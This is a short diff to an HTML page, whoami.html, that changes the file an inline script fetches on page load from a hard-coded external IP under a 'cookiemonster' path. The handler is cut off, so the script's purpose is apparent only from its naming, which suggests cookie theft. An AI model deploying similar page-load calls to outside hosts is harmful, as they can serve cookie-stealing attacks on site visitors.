--- a/whoami.html
+++ b/whoami.html
@@ -3,7 +3,7 @@
 <body>
 <script>
 var xhttp = new XMLHttpRequest();
-var url = 'http://93.66.243.251/cookiemonster/cookie.txt';
+var url = 'http://93.66.243.251/cookiemonster/cookie.html';
 xhttp.open('GET', url , true);
 xhttp.send();
 xhttp.onreadystatechange = function() {
